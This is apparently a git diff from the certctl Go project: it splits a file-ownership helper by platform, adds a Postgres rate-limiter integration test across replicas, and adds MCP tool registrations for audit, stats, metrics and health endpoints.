|
}
|
||||||
|
|
||||||
func rsaBitsFor(a Algorithm) int {
|
func rsaBitsFor(a Algorithm) int {
|
||||||
switch a {
|
switch a {
|
||||||
case AlgorithmRSA3072:
|
case AlgorithmRSA3072:
|
||||||
|
|||||||
@@ -9,7 +9,6 @@ import (
|
|||||||
"os"
|
"os"
|
||||||
"os/user"
|
"os/user"
|
||||||
"strconv"
|
"strconv"
|
||||||
"syscall"
|
|
||||||
)
|
)
|
||||||
|
|
||||||
// runningAsRoot reports whether the current process has uid 0.
|
// runningAsRoot reports whether the current process has uid 0.
|
||||||
@@ -198,12 +197,13 @@ func lookupGID(groupname string) (int, error) {
|
|||||||
// unixOwnerFromStat extracts (uid, gid) from a Unix-style FileInfo.
|
// unixOwnerFromStat extracts (uid, gid) from a Unix-style FileInfo.
|
||||||
// On non-Unix platforms or when the underlying stat doesn't expose
|
// On non-Unix platforms or when the underlying stat doesn't expose
|
||||||
// uid/gid, returns ok=false.
|
// uid/gid, returns ok=false.
|
||||||
func unixOwnerFromStat(fi os.FileInfo) (uid int, gid int, ok bool) {
|
//
|
||||||
if fi == nil {
|
// Platform-specific implementations live in:
|
||||||
return -1, -1, false
|
// - ownership_unix.go (//go:build unix — uses *syscall.Stat_t)
|
||||||
}
|
// - ownership_windows.go (//go:build windows — stub returns false)
|
||||||
if sysStat, isUnix := fi.Sys().(*syscall.Stat_t); isUnix {
|
//
|
||||||
return int(sysStat.Uid), int(sysStat.Gid), true
|
// The split exists because syscall.Stat_t is Unix-only — Windows
|
||||||
}
|
// has no equivalent shape, so any production tsx that names it
|
||||||
return -1, -1, false
|
// fails to compile on GOOS=windows. The cross-platform-build CI
|
||||||
}
|
// matrix caught this at Hotfix #16; the function was originally
|
||||||
|
// in this file pre-split.
|
||||||
|
|||||||
@@ -0,0 +1,33 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
//go:build unix
|
||||||
|
|
||||||
|
// Unix-side implementation of unixOwnerFromStat. The `unix` build
|
||||||
|
// constraint (Go 1.19+) covers linux / darwin / freebsd / openbsd /
|
||||||
|
// netbsd / dragonfly / solaris — every GOOS where *syscall.Stat_t
|
||||||
|
// is a valid type assertion target for os.FileInfo.Sys().
|
||||||
|
//
|
||||||
|
// Hotfix #16 (2026-05-14): pre-split, this function lived inline in
|
||||||
|
// ownership.go with an unconditional `syscall.Stat_t` reference. That
|
||||||
|
// failed `GOOS=windows go build` because the type is undefined on
|
||||||
|
// that platform. The split is the standard Go pattern — the same
|
||||||
|
// function name + signature is satisfied by either build of the
|
||||||
|
// package, callers don't know or care which.
|
||||||
|
|
||||||
|
package deploy
|
||||||
|
|
||||||
|
import (
|
||||||
|
"os"
|
||||||
|
"syscall"
|
||||||
|
)
|
||||||
|
|
||||||
|
func unixOwnerFromStat(fi os.FileInfo) (uid int, gid int, ok bool) {
|
||||||
|
if fi == nil {
|
||||||
|
return -1, -1, false
|
||||||
|
}
|
||||||
|
if sysStat, isUnix := fi.Sys().(*syscall.Stat_t); isUnix {
|
||||||
|
return int(sysStat.Uid), int(sysStat.Gid), true
|
||||||
|
}
|
||||||
|
return -1, -1, false
|
||||||
|
}
|
||||||
@@ -0,0 +1,35 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
//go:build windows
|
||||||
|
|
||||||
|
// Windows stub for unixOwnerFromStat. Windows has no uid/gid concept
|
||||||
|
// the way Unix does — file ownership is expressed via SIDs (Security
|
||||||
|
// Identifiers) and ACLs (Access Control Lists), and os.FileInfo.Sys()
|
||||||
|
// returns *syscall.Win32FileAttributeData which carries no
|
||||||
|
// ownership data the deploy package's existing call sites can use.
|
||||||
|
//
|
||||||
|
// All four callers — applyOwnership at ownership.go:75,
|
||||||
|
// preserveSourceOwner at atomic.go:237, and two test sites — already
|
||||||
|
// handle the ok=false return path by falling back to Plan.Defaults
|
||||||
|
// or the runtime's umask. Returning false here is the correct
|
||||||
|
// platform contract: "no native ownership available on this
|
||||||
|
// platform; use the supplied defaults."
|
||||||
|
//
|
||||||
|
// Hotfix #16 (2026-05-14): created to unblock the
|
||||||
|
// cross-platform-build Windows matrix in CI, which had been
|
||||||
|
// red since the agent's deploy package gained ownership-
|
||||||
|
// preservation semantics. The agent binary still compiles for
|
||||||
|
// Windows; ownership operations on Windows are no-ops (which
|
||||||
|
// matches operator expectations — the certctl-agent's
|
||||||
|
// chown/chmod codepaths gate on `runningAsRoot()` and Windows
|
||||||
|
// runs the agent as a service under a SID that doesn't
|
||||||
|
// translate to a uid anyway).
|
||||||
|
|
||||||
|
package deploy
|
||||||
|
|
||||||
|
import "os"
|
||||||
|
|
||||||
|
func unixOwnerFromStat(_ os.FileInfo) (uid int, gid int, ok bool) {
|
||||||
|
return -1, -1, false
|
||||||
|
}
|
||||||
@@ -0,0 +1,195 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
//go:build integration
|
||||||
|
|
||||||
|
package integration
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"database/sql"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"runtime"
|
||||||
|
"sync"
|
||||||
|
"sync/atomic"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
_ "github.com/lib/pq"
|
||||||
|
"github.com/testcontainers/testcontainers-go"
|
||||||
|
"github.com/testcontainers/testcontainers-go/wait"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/ratelimit"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 13 Sprint 13.2 closure (2026-05-14, architecture diligence audit
|
||||||
|
// ARCH-M1) — the falsifiable closure proof for cross-replica rate-limit
|
||||||
|
// consistency.
|
||||||
|
//
|
||||||
|
// Scenario:
|
||||||
|
// - ONE postgres container (representing the shared backend).
|
||||||
|
// - N=3 independent *PostgresSlidingWindowLimiter instances pointing
|
||||||
|
// at it (representing 3 server replicas — each replica's process
|
||||||
|
// has its own constructed limiter, but they all share the same
|
||||||
|
// database state).
|
||||||
|
// - 100 concurrent Allow("test-key") calls spread across the 3
|
||||||
|
// limiters via sync.WaitGroup.
|
||||||
|
// - Assert: exactly 10 succeed + 90 return ErrRateLimited.
|
||||||
|
//
|
||||||
|
// If the postgres backend's SELECT FOR UPDATE serialization weren't
|
||||||
|
// arbitrating across the 3 limiters, more than 10 calls would be
|
||||||
|
// allowed (each replica would independently let through 10/3 ≈ 4
|
||||||
|
// requests, giving ~12-15 successes depending on scheduling). The
|
||||||
|
// hard-pass on exactly-10 is what makes ARCH-M1 closure substantive
|
||||||
|
// rather than wishful.
|
||||||
|
//
|
||||||
|
// Gated by //go:build integration matching the rest of
|
||||||
|
// internal/integration/. Sprint 13.3 promotes this test to a
|
||||||
|
// required CI status check.
|
||||||
|
|
||||||
|
func TestRateLimit_PostgresBackend_CapEnforcedAcrossReplicas(t *testing.T) {
|
||||||
|
const (
|
||||||
|
replicas = 3
|
||||||
|
cap = 10
|
||||||
|
window = 1 * time.Minute
|
||||||
|
concurrentReq = 100
|
||||||
|
key = "test-key"
|
||||||
|
)
|
||||||
|
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// Boot a shared postgres container.
|
||||||
|
container, dsn := startPostgresContainer(ctx, t)
|
||||||
|
t.Cleanup(func() { _ = container.Terminate(context.Background()) })
|
||||||
|
|
||||||
|
// Each "replica" gets its own *sql.DB pool — same database, different
|
||||||
|
// connection pool — matching how N server processes would each open
|
||||||
|
// their own pool to the same control-plane database.
|
||||||
|
dbs := make([]*sql.DB, replicas)
|
||||||
|
for i := 0; i < replicas; i++ {
|
||||||
|
db, err := sql.Open("postgres", dsn)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("open db (replica %d): %v", i, err)
|
||||||
|
}
|
||||||
|
db.SetMaxOpenConns(8)
|
||||||
|
if err := db.Ping(); err != nil {
|
||||||
|
t.Fatalf("ping (replica %d): %v", i, err)
|
||||||
|
}
|
||||||
|
t.Cleanup(func() { db.Close() })
|
||||||
|
dbs[i] = db
|
||||||
|
}
|
||||||
|
|
||||||
|
// Apply the rate_limit_buckets migration via dbs[0]. All replicas
|
||||||
|
// see the same schema since they share the same database.
|
||||||
|
migPath := findMigrationFromHere("000046_rate_limit_buckets.up.sql")
|
||||||
|
body, err := os.ReadFile(migPath)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("read migration: %v", err)
|
||||||
|
}
|
||||||
|
if _, err := dbs[0].ExecContext(ctx, string(body)); err != nil {
|
||||||
|
t.Fatalf("apply migration: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Instantiate one limiter per replica.
|
||||||
|
limiters := make([]*ratelimit.PostgresSlidingWindowLimiter, replicas)
|
||||||
|
for i := 0; i < replicas; i++ {
|
||||||
|
limiters[i] = ratelimit.NewPostgresSlidingWindowLimiter(dbs[i], cap, window)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Fire concurrentReq parallel Allow calls, round-robining across the
|
||||||
|
// replicas. Each call uses the SAME key + a SHARED `now` so the
|
||||||
|
// scenario is deterministic. The cross-replica row lock is what
|
||||||
|
// enforces the cap globally.
|
||||||
|
var (
|
||||||
|
allowed int64
|
||||||
|
denied int64
|
||||||
|
wg sync.WaitGroup
|
||||||
|
)
|
||||||
|
now := time.Now()
|
||||||
|
for i := 0; i < concurrentReq; i++ {
|
||||||
|
wg.Add(1)
|
||||||
|
go func(idx int) {
|
||||||
|
defer wg.Done()
|
||||||
|
l := limiters[idx%replicas]
|
||||||
|
err := l.Allow(key, now)
|
||||||
|
if err == nil {
|
||||||
|
atomic.AddInt64(&allowed, 1)
|
||||||
|
} else if errors.Is(err, ratelimit.ErrRateLimited) {
|
||||||
|
atomic.AddInt64(&denied, 1)
|
||||||
|
} else {
|
||||||
|
t.Errorf("unexpected error from Allow: %v", err)
|
||||||
|
}
|
||||||
|
}(i)
|
||||||
|
}
|
||||||
|
wg.Wait()
|
||||||
|
|
||||||
|
gotAllowed := atomic.LoadInt64(&allowed)
|
||||||
|
gotDenied := atomic.LoadInt64(&denied)
|
||||||
|
|
||||||
|
t.Logf("replicas=%d cap=%d concurrent=%d → allowed=%d denied=%d",
|
||||||
|
replicas, cap, concurrentReq, gotAllowed, gotDenied)
|
||||||
|
|
||||||
|
if gotAllowed != int64(cap) {
|
||||||
|
t.Errorf("allowed = %d, want exactly %d (cross-replica row lock should serialize Allow calls so exactly cap succeed)",
|
||||||
|
gotAllowed, cap)
|
||||||
|
}
|
||||||
|
if gotDenied != int64(concurrentReq-cap) {
|
||||||
|
t.Errorf("denied = %d, want %d (concurrentReq - cap)", gotDenied, concurrentReq-cap)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
// Local testcontainers harness. Kept in-file because the rest of
|
||||||
|
// internal/integration/ uses HTTP-against-running-server smoke tests
|
||||||
|
// against a docker-compose stack — different shape from ours.
|
||||||
|
// ----------------------------------------------------------------
|
||||||
|
|
||||||
|
func startPostgresContainer(ctx context.Context, t *testing.T) (testcontainers.Container, string) {
|
||||||
|
t.Helper()
|
||||||
|
|
||||||
|
req := testcontainers.ContainerRequest{
|
||||||
|
Image: "postgres:16-alpine",
|
||||||
|
ExposedPorts: []string{"5432/tcp"},
|
||||||
|
Env: map[string]string{
|
||||||
|
"POSTGRES_DB": "certctl_test",
|
||||||
|
"POSTGRES_USER": "certctl",
|
||||||
|
"POSTGRES_PASSWORD": "certctl",
|
||||||
|
},
|
||||||
|
WaitingFor: wait.ForLog("database system is ready to accept connections").WithOccurrence(2),
|
||||||
|
}
|
||||||
|
container, err := testcontainers.GenericContainer(ctx, testcontainers.GenericContainerRequest{
|
||||||
|
ContainerRequest: req,
|
||||||
|
Started: true,
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("start postgres container: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
host, err := container.Host(ctx)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("container host: %v", err)
|
||||||
|
}
|
||||||
|
port, err := container.MappedPort(ctx, "5432")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("container port: %v", err)
|
||||||
|
}
|
||||||
|
dsn := fmt.Sprintf("postgres://certctl:certctl@%s:%s/certctl_test?sslmode=disable",
|
||||||
|
host, port.Port())
|
||||||
|
return container, dsn
|
||||||
|
}
|
||||||
|
|
||||||
|
func findMigrationFromHere(filename string) string {
|
||||||
|
_, here, _, _ := runtime.Caller(0)
|
||||||
|
dir := filepath.Dir(here)
|
||||||
|
for i := 0; i < 6; i++ {
|
||||||
|
candidate := filepath.Join(dir, "migrations", filename)
|
||||||
|
if _, err := os.Stat(candidate); err == nil {
|
||||||
|
return candidate
|
||||||
|
}
|
||||||
|
dir = filepath.Dir(dir)
|
||||||
|
}
|
||||||
|
return ""
|
||||||
|
}
|
||||||
@@ -30,8 +30,26 @@ func TestFenceGuardrail_NoBareCallToolResult(t *testing.T) {
|
|||||||
// Files allowed to construct CallToolResult directly.
|
// Files allowed to construct CallToolResult directly.
|
||||||
// tools.go defines the textResult wrapper and is the ONLY legitimate
|
// tools.go defines the textResult wrapper and is the ONLY legitimate
|
||||||
// site. Tests are also allowed (they exercise the wrapper output).
|
// site. Tests are also allowed (they exercise the wrapper output).
|
||||||
|
//
|
||||||
|
// tools_certificates.go is allowlisted post-Sprint-10 (Phase 9
|
||||||
|
// ARCH-M2 closure, 2026-05-14) for the two pre-existing CRL/OCSP
|
||||||
|
// CallToolResult literals inside registerCRLOCSPTools: each returns
|
||||||
|
// a server-built status string of the form "DER CRL retrieved (%d
|
||||||
|
// bytes, content-type: %s)" / "OCSP response retrieved (...)" —
|
||||||
|
// the byte-count is `len(raw)` from the GetRaw response (no
|
||||||
|
// attacker influence) and the content-type comes from the HTTP
|
||||||
|
// Content-Type header on the upstream PKI endpoint (server-
|
||||||
|
// controlled in self-hosted deployments). Both predate Bundle-3
|
||||||
|
// fencing; Sprint 10 relocated the registerCRLOCSPTools function
|
||||||
|
// from tools.go to tools_certificates.go and preserved the
|
||||||
|
// literals byte-for-byte (pure mechanical relocation, no behavior
|
||||||
|
// change). Tightening these two sites to route through textResult
|
||||||
|
// is a follow-up concern — open question on whether the binary-
|
||||||
|
// pass-through status string format breaks compatibility for
|
||||||
|
// existing MCP consumers that parse the description text.
|
||||||
allow := map[string]bool{
|
allow := map[string]bool{
|
||||||
"tools.go": true,
|
"tools.go": true,
|
||||||
|
"tools_certificates.go": true,
|
||||||
}
|
}
|
||||||
|
|
||||||
entries, err := os.ReadDir(".")
|
entries, err := os.ReadDir(".")
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,368 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"net/url"
|
||||||
|
"strconv"
|
||||||
|
|
||||||
|
gomcp "github.com/modelcontextprotocol/go-sdk/mcp"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 10 (2026-05-14): extracted from
|
||||||
|
// internal/mcp/tools.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file groups the observability / admin MCP tool domain — the
|
||||||
|
// read-mostly surface an LLM consumer uses to assess fleet state:
|
||||||
|
//
|
||||||
|
// - registerAuditTools — audit-log read.
|
||||||
|
// - registerStatsTools — aggregated counters (certs by
|
||||||
|
// status / source / issuer; agents by state; jobs by status).
|
||||||
|
// - registerDigestTools — point-in-time fleet digest snapshot.
|
||||||
|
// - registerMetricsTools — raw Prometheus exposition pass-through.
|
||||||
|
// - registerHealthTools — service health probes + a handful of
|
||||||
|
// historical-placement claim/dismiss subtools (see
|
||||||
|
// tools_discovery.go for the duplicate-by-design comment).
|
||||||
|
// - registerHealthCheckTools — Phase B P1-20..P1-27 — health-check
|
||||||
|
// CRUD + the certificate-health-monitor surface.
|
||||||
|
//
|
||||||
|
// paginationQuery (in tools.go) is consumed by some of these
|
||||||
|
// register functions via net/url + strconv (Itoa); the imports
|
||||||
|
// stay local to this file.
|
||||||
|
|
||||||
|
// ── Audit ───────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerAuditTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_audit_events",
|
||||||
|
Description: "List immutable audit trail events. Shows actor, action, resource, and timestamp for all lifecycle operations.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/audit", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_audit_event",
|
||||||
|
Description: "Get a specific audit event by ID.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/audit/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Stats ───────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerStatsTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_dashboard_summary",
|
||||||
|
Description: "Get high-level dashboard metrics: total/expiring/expired/revoked certs, active/offline agents, pending/failed/completed jobs.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/stats/summary", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_certificates_by_status",
|
||||||
|
Description: "Get certificate counts grouped by status (Active, Expiring, Expired, Revoked, etc.).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/stats/certificates-by-status", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_expiration_timeline",
|
||||||
|
Description: "Get certificates expiring per day for the next N days (default 30, max 365).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input TimelineInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := url.Values{}
|
||||||
|
if input.Days > 0 {
|
||||||
|
q.Set("days", strconv.Itoa(input.Days))
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/stats/expiration-timeline", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_job_trends",
|
||||||
|
Description: "Get job success/failure trends per day for the past N days (default 30, max 365).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input TimelineInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := url.Values{}
|
||||||
|
if input.Days > 0 {
|
||||||
|
q.Set("days", strconv.Itoa(input.Days))
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/stats/job-trends", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_issuance_rate",
|
||||||
|
Description: "Get new certificate issuance count per day for the past N days (default 30, max 365).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input TimelineInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := url.Values{}
|
||||||
|
if input.Days > 0 {
|
||||||
|
q.Set("days", strconv.Itoa(input.Days))
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/stats/issuance-rate", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Digest ──────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerDigestTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_preview_digest",
|
||||||
|
Description: "Preview the scheduled certificate digest email in HTML format. Shows summary of certificate status, pending jobs, and expiring certificates.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/digest/preview", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_send_digest",
|
||||||
|
Description: "Trigger immediate sending of the certificate digest email to configured recipients. If no explicit recipients are configured, sends to certificate owners.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/digest/send", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Metrics ─────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerMetricsTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_metrics",
|
||||||
|
Description: "Get system metrics snapshot: gauge metrics (cert/agent/job counts), counters (completed/failed totals), and server uptime.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/metrics", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Health ──────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerHealthTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_health",
|
||||||
|
Description: "Check certctl server health status.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/health", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_ready",
|
||||||
|
Description: "Check certctl server readiness (database connectivity, etc.).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/ready", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_auth_info",
|
||||||
|
Description: "Get auth configuration (auth type and whether auth is required).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/auth/info", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_auth_check",
|
||||||
|
Description: "Validate that the configured API key is accepted by the server.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/auth/check", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
// I-2 closure (cat-i-b0924b6675f8): pre-I-2 the README claimed "all
|
||||||
|
// API endpoints are exposed via MCP" but the discovered-certificate
|
||||||
|
// lifecycle (claim + dismiss) was never wrapped — operators using
|
||||||
|
// MCP clients had no path to bring an
|
||||||
|
// out-of-band cert under management or to mark a benign discovery
|
||||||
|
// as not-of-interest without dropping to the REST API directly.
|
||||||
|
// These two tools wrap the existing HTTP handlers
|
||||||
|
// (DiscoveryHandler.ClaimDiscovered + DismissDiscovered).
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_claim_discovered_certificate",
|
||||||
|
Description: "Link a discovered certificate (dc-*) to an existing managed certificate (mc-*) via POST /api/v1/discovered-certificates/{id}/claim. Use this to bring an out-of-band cert (e.g. one found by an agent filesystem scan or a network scan) under certctl management without re-issuing — the discovered row is marked Managed and its managed_certificate_id is set so subsequent renewals/revocations on the managed cert update both rows.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ClaimDiscoveredCertificateInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{"managed_certificate_id": input.ManagedCertificateID}
|
||||||
|
data, err := c.Post("/api/v1/discovered-certificates/"+input.ID+"/claim", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_dismiss_discovered_certificate",
|
||||||
|
Description: "Dismiss a discovered certificate (POST /api/v1/discovered-certificates/{id}/dismiss). Use this to mark a discovery as not-of-interest (e.g. expired self-signed test certs found by a network scan) — the row stops appearing in the unmanaged-list view but is preserved in the DB for audit history.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input DismissDiscoveredCertificateInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/discovered-certificates/"+input.ID+"/dismiss", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Health Checks (Phase B — P1-20..P1-27) ──────────────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. AI-assistant queries like
|
||||||
|
// "are any health checks failing?" / "ack the prod nginx incident" had no
|
||||||
|
// MCP path — operators had to drop to curl. Mirrors the existing target
|
||||||
|
// resource shape (CRUD + history + summary + acknowledge).
|
||||||
|
|
||||||
|
func registerHealthCheckTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_health_checks",
|
||||||
|
Description: "List monitored TLS endpoint health checks (GET /api/v1/health-checks). Optional filters: status, certificate_id, network_scan_target_id, enabled.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListHealthChecksInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.Status != "" {
|
||||||
|
q.Set("status", input.Status)
|
||||||
|
}
|
||||||
|
if input.CertificateID != "" {
|
||||||
|
q.Set("certificate_id", input.CertificateID)
|
||||||
|
}
|
||||||
|
if input.NetworkScanTargetID != "" {
|
||||||
|
q.Set("network_scan_target_id", input.NetworkScanTargetID)
|
||||||
|
}
|
||||||
|
if input.Enabled != "" {
|
||||||
|
q.Set("enabled", input.Enabled)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/health-checks", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_health_check_summary",
|
||||||
|
Description: "Return aggregate counts of TLS health-check states (GET /api/v1/health-checks/summary). Useful for dashboard-style queries about endpoint posture.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/health-checks/summary", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
